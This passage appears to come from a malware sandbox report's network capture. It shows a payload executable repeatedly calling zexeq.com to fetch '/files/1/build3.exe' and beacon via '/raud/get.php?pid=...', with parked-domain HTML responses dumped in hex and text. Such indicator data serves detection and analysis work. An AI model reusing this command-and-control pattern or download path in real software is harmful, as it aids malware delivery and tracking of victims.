                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                      Host: zexeq.com
                                                                                                      Feb 12, 2024 01:35:56.603971958 CET1286INHTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Mon, 12 Feb 2024 00:35:56 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: keep-alive
                                                                                                      Set-Cookie: parking_session=4a25a78a-7e70-da91-9fcb-1f470520f028; expires=Mon, 12 Feb 2024 00:50:56 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AyFYBBlMTK+s2drH8M/UuPtOwgC0Q5I+qr6O091jvNRK6y+GaB6ZjIqhRqzVqygllAXfB/mUUSa2qc1J/c/Glg==
                                                                                                      Cache-Control: no-cache
                                                                                                      Accept-CH: sec-ch-prefers-color-scheme
                                                                                                      Critical-CH: sec-ch-prefers-color-scheme
                                                                                                      Vary: sec-ch-prefers-color-scheme
                                                                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                      Cache-Control: no-store, must-revalidate
                                                                                                      Cache-Control: post-check=0, pre-check=0
                                                                                                      Pragma: no-cache
                                                                                                      Data Raw: 33 35 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 79 46 59 42 42 6c 4d 54 4b 2b 73 32 64 72 48 38 4d 2f 55 75 50 74 4f 77 67 43 30 51 35 49 2b 71 72 36 4f 30 39 31 6a 76 4e 52 4b 36 79 2b 47 61 42 36 5a 6a 49 71 68 52 71 7a 56 71 79 67 6c 6c 41 58 66 42 2f 6d 55 55 53 61 32 71 63 31 4a 2f 63 2f 47 6c 67 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f 70 61 63 69
                                                                                                      Data Ascii: 35b<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AyFYBBlMTK+s2drH8M/UuPtOwgC0Q5I+qr6O091jvNRK6y+GaB6ZjIqhRqzVqygllAXfB/mUUSa2qc1J/c/Glg=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style='opaci
                                                                                                      Feb 12, 2024 01:35:56.604015112 CET401INData Raw: 74 79 3a 20 30 27 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 70 61 72 6b 20 3d 20 22 65 79 4a 31 64 57 6c 6b 49 6a 6f 69 4e 47 45 79 4e 57 45 33 4f 47 45 74 4e 32 55 33 4d 43 31 6b 59 54 6b 78 4c 54 6c 6d 59 32 49 74 4d 57
                                                                                                      Data Ascii: ty: 0'></div><script>window.park = "eyJ1dWlkIjoiNGEyNWE3OGEtN2U3MC1kYTkxLTlmY2ItMWY0NzA1MjBmMDI4IiwicGFnZV90aW1lIjoxNzA3Njk4MTU2LCJwYWdlX3VybCI6Imh0dHA6XC9cL3pleGVxLmNvbVwvZmlsZXNcLzFcL2J1aWxkMy5leGUiLCJwYWdlX21ldGhvZCI6IkdFVCIsInBhZ2VfcmVxdWV
                                                                                                      Feb 12, 2024 01:35:56.604048014 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.449731199.59.242.150806956C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 12, 2024 01:35:56.491031885 CET136OUTGET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1
                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                      Host: zexeq.com
                                                                                                      Feb 12, 2024 01:35:56.609514952 CET1286INHTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Mon, 12 Feb 2024 00:35:56 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: keep-alive
                                                                                                      Set-Cookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c; expires=Mon, 12 Feb 2024 00:50:56 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mao3xZh/knUoTIyBo3a3CCu4KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ==
                                                                                                      Cache-Control: no-cache
                                                                                                      Accept-CH: sec-ch-prefers-color-scheme
                                                                                                      Critical-CH: sec-ch-prefers-color-scheme
                                                                                                      Vary: sec-ch-prefers-color-scheme
                                                                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                      Cache-Control: no-store, must-revalidate
                                                                                                      Cache-Control: post-check=0, pre-check=0
                                                                                                      Pragma: no-cache
                                                                                                      Data Raw: 33 39 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6d 61 6f 33 78 5a 68 2f 6b 6e 55 6f 54 49 79 42 6f 33 61 33 43 43 75 34 4b 6e 70 70 52 6c 59 6a 6d 72 61 38 34 35 43 68 63 4b 39 4b 66 63 43 36 6f 79 45 51 33 57 52 30 6a 54 75 39 54 71 4d 36 42 6a 53 32 65 43 68 4d 78 37 4d 43 62 65 31 4c 39 4e 35 32 58 51 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f 70 61 63 69
                                                                                                      Data Ascii: 393<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mao3xZh/knUoTIyBo3a3CCu4KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style='opaci
                                                                                                      Feb 12, 2024 01:35:56.609550953 CET457INData Raw: 74 79 3a 20 30 27 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 70 61 72 6b 20 3d 20 22 65 79 4a 31 64 57 6c 6b 49 6a 6f 69 4d 6d 51 33 4e 47 59 77 59 32 51 74 4e 47 5a 6d 4d 53 31 6a 4d 6a 63 7a 4c 54 4d 7a 5a 6a 45 74 5a 6a
                                                                                                      Data Ascii: ty: 0'></div><script>window.park = "eyJ1dWlkIjoiMmQ3NGYwY2QtNGZmMS1jMjczLTMzZjEtZjNmMTEyNmU3OThjIiwicGFnZV90aW1lIjoxNzA3Njk4MTU2LCJwYWdlX3VybCI6Imh0dHA6XC9cL3pleGVxLmNvbVwvcmF1ZFwvZ2V0LnBocD9waWQ9RjhBRkNEQzRFODAwQTMzMTlGRkIzNDNFODMwOTk2MzcmZml
                                                                                                      Feb 12, 2024 01:35:56.609584093 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0
                                                                                                      Feb 12, 2024 01:36:01.604569912 CET198OUTGET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1
                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                      Host: zexeq.com
                                                                                                      Cookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c
                                                                                                      Feb 12, 2024 01:36:01.722901106 CET1286INHTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Mon, 12 Feb 2024 00:36:01 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: keep-alive
                                                                                                      Set-Cookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c; expires=Mon, 12 Feb 2024 00:51:01 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mao3xZh/knUoTIyBo3a3CCu4KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ==
                                                                                                      Cache-Control: no-cache
                                                                                                      Accept-CH: sec-ch-prefers-color-scheme
                                                                                                      Critical-CH: sec-ch-prefers-color-scheme
                                                                                                      Vary: sec-ch-prefers-color-scheme
                                                                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                      Cache-Control: no-store, must-revalidate
                                                                                                      Cache-Control: post-check=0, pre-check=0
                                                                                                      Pragma: no-cache
                                                                                                      Data Raw: 33 39 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6d 61 6f 33 78 5a 68 2f 6b 6e 55 6f 54 49 79 42 6f 33 61 33 43 43 75 34 4b 6e 70 70 52 6c 59 6a 6d 72 61 38 34 35 43 68 63 4b 39 4b 66 63 43 36 6f 79 45 51 33 57 52 30 6a 54 75 39 54 71 4d 36 42 6a 53 32 65 43 68 4d 78 37 4d 43 62 65 31 4c 39 4e 35 32 58 51 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f 70 61 63 69
                                                                                                      Data Ascii: 393<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mao3xZh/knUoTIyBo3a3CCu4KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style='opaci
                                                                                                      Feb 12, 2024 01:36:01.722963095 CET457INData Raw: 74 79 3a 20 30 27 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 70 61 72 6b 20 3d 20 22 65 79 4a 31 64 57 6c 6b 49 6a 6f 69 4d 6d 51 33 4e 47 59 77 59 32 51 74 4e 47 5a 6d 4d 53 31 6a 4d 6a 63 7a 4c 54 4d 7a 5a 6a 45 74 5a 6a
                                                                                                      Data Ascii: ty: 0'></div><script>window.park = "eyJ1dWlkIjoiMmQ3NGYwY2QtNGZmMS1jMjczLTMzZjEtZjNmMTEyNmU3OThjIiwicGFnZV90aW1lIjoxNzA3Njk4MTYxLCJwYWdlX3VybCI6Imh0dHA6XC9cL3pleGVxLmNvbVwvcmF1ZFwvZ2V0LnBocD9waWQ9RjhBRkNEQzRFODAwQTMzMTlGRkIzNDNFODMwOTk2MzcmZml
                                                                                                      Feb 12, 2024 01:36:01.723001003 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0
                                                                                                      Feb 12, 2024 01:36:06.791857958 CET198OUTGET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1
                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                      Host: zexeq.com
                                                                                                      Cookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c
                                                                                                      Feb 12, 2024 01:36:06.910274982 CET1286INHTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Mon, 12 Feb 2024 00:36:06 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: keep-alive
                                                                                                      Set-Cookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c; expires=Mon, 12 Feb 2024 00:51:06 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mao3xZh/knUoTIyBo3a3CCu4KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ==
                                                                                                      Cache-Control: no-cache
                                                                                                      Accept-CH: sec-ch-prefers-color-scheme
                                                                                                      Critical-CH: sec-ch-prefers-color-scheme
                                                                                                      Vary: sec-ch-prefers-color-scheme
                                                                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                      Cache-Control: no-store, must-revalidate
                                                                                                      Cache-Control: post-check=0, pre-check=0
                                                                                                      Pragma: no-cache
                                                                                                      Data Raw: 33 39 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6d 61 6f 33 78 5a 68 2f 6b 6e 55 6f 54 49 79 42 6f 33 61 33 43 43 75 34 4b 6e 70 70 52 6c 59 6a 6d 72 61 38 34 35 43 68 63 4b 39 4b 66 63 43 36 6f 79 45 51 33 57 52 30 6a 54 75 39 54 71 4d 36 42 6a 53 32 65 43 68 4d 78 37 4d 43 62 65 31 4c 39 4e 35 32 58 51 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f 70 61 63 69
                                                                                                      Data Ascii: 393<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mao3xZh/knUoTIyBo3a3CCu4KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style='opaci
                                                                                                      Feb 12, 2024 01:36:06.910336018 CET457INData Raw: 74 79 3a 20 30 27 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 70 61 72 6b 20 3d 20 22 65 79 4a 31 64 57 6c 6b 49 6a 6f 69 4d 6d 51 33 4e 47 59 77 59 32 51 74 4e 47 5a 6d 4d 53 31 6a 4d 6a 63 7a 4c 54 4d 7a 5a 6a 45 74 5a 6a
                                                                                                      Data Ascii: ty: 0'></div><script>window.park = "eyJ1dWlkIjoiMmQ3NGYwY2QtNGZmMS1jMjczLTMzZjEtZjNmMTEyNmU3OThjIiwicGFnZV90aW1lIjoxNzA3Njk4MTY2LCJwYWdlX3VybCI6Imh0dHA6XC9cL3pleGVxLmNvbVwvcmF1ZFwvZ2V0LnBocD9waWQ9RjhBRkNEQzRFODAwQTMzMTlGRkIzNDNFODMwOTk2MzcmZml
                                                                                                      Feb 12, 2024 01:36:06.910376072 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0
                                                                                                      Feb 12, 2024 01:36:11.944216967 CET198OUTGET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1
                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                      Host: zexeq.com
                                                                                                      Cookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c
                                                                                                      Feb 12, 2024 01:36:12.062108040 CET1286INHTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Mon, 12 Feb 2024 00:36:12 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: keep-alive
                                                                                                      Set-Cookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c; expires=Mon, 12 Feb 2024 00:51:12 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mao3xZh/knUoTIyBo3a3CCu4KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ==
                                                                                                      Cache-Control: no-cache
                                                                                                      Accept-CH: sec-ch-prefers-color-scheme
                                                                                                      Critical-CH: sec-ch-prefers-color-scheme
                                                                                                      Vary: sec-ch-prefers-color-scheme
                                                                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                      Cache-Control: no-store, must-revalidate
                                                                                                      Cache-Control: post-check=0, pre-check=0
                                                                                                      Pragma: no-cache
                                                                                                      Data Raw: 33 39 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6d 61 6f 33 78 5a 68 2f 6b 6e 55 6f 54 49 79 42 6f 33 61 33 43 43 75 34 4b 6e 70 70 52 6c 59 6a 6d 72 61 38 34 35 43 68 63 4b 39 4b 66 63 43 36 6f 79 45 51 33 57 52 30 6a 54 75 39 54 71 4d 36 42 6a 53 32 65 43 68 4d 78 37 4d 43 62 65 31 4c 39 4e 35 32 58 51 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f 70 61 63 69
                                                                                                      Data Ascii: 393<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_mao3xZh/knUoTIyBo3a3CCu4KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style='opaci
                                                                                                      Feb 12, 2024 01:36:12.062120914 CET457INData Raw: 74 79 3a 20 30 27 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 70 61 72 6b 20 3d 20 22 65 79 4a 31 64 57 6c 6b 49 6a 6f 69 4d 6d 51 33 4e 47 59 77 59 32 51 74 4e 47 5a 6d 4d 53 31 6a 4d 6a 63 7a 4c 54 4d 7a 5a 6a 45 74 5a 6a
                                                                                                      Data Ascii: ty: 0'></div><script>window.park = "eyJ1dWlkIjoiMmQ3NGYwY2QtNGZmMS1jMjczLTMzZjEtZjNmMTEyNmU3OThjIiwicGFnZV90aW1lIjoxNzA3Njk4MTcyLCJwYWdlX3VybCI6Imh0dHA6XC9cL3pleGVxLmNvbVwvcmF1ZFwvZ2V0LnBocD9waWQ9RjhBRkNEQzRFODAwQTMzMTlGRkIzNDNFODMwOTk2MzcmZml
                                                                                                      Feb 12, 2024 01:36:12.062130928 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.449734199.59.242.150805776C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 12, 2024 01:35:58.283723116 CET187OUTGET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1
                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                      Host: zexeq.com
                                                                                                      Cookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c
                                                                                                      Feb 12, 2024 01:35:58.402215004 CET1286INHTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Mon, 12 Feb 2024 00:35:58 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: keep-alive
                                                                                                      Set-Cookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c; expires=Mon, 12 Feb 2024 00:50:58 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_n75xuvH1ruuh5wuSad1OP5wNm7LsolZxzMWMgrdmCkrjFmGI0KLCAxbuBHnzTOilT/h6ps2rqpBqNktqWhDXuA==
                                                                                                      Cache-Control: no-cache
                                                                                                      Accept-CH: sec-ch-prefers-color-scheme
                                                                                                      Critical-CH: sec-ch-prefers-color-scheme
                                                                                                      Vary: sec-ch-prefers-color-scheme
                                                                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                      Cache-Control: no-store, must-revalidate
                                                                                                      Cache-Control: post-check=0, pre-check=0
                                                                                                      Pragma: no-cache
